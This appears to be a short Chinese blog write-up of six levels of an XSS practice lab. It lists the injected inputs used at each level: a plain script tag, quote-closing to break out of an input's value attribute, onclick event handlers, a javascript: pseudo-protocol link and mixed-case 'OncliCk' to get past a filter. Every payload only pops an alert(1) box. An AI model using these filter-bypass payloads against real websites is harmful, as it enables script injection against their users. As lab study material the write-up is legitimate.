本文介绍了六关的XSS(Cross Site Scripting)实战,从简单的输入注入到利用属性闭合、事件触发,再到JavaScript伪协议和大小写混淆,展示了XSS攻击的各种常见手法及其防御策略。
查看源代码可以看到这个
<input name=keyword value="test">
只要加上
<script>alert('1')</script>
<input name=keyword value="test">
用同样的方法发现行不通
所以想到了用闭合的方法
1"> <script>alert(1)</script>wait
<input name=keyword value=''>
发现用>闭合没用,想到了用onclick这个
1' onclick=alert(1) //
<input name=keyword value="try harder!">
和第三关差不多用的是双引号
1" onclick=alert(1) //
input name=keyword value="find a way out!">
这里利用了javascript:alert(1)
"><a href=" javascript:alert(1)
点搜索左边的蓝色的">
试了好多发现可以用大小写来绕过
" OncliCk=alert(1) //
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
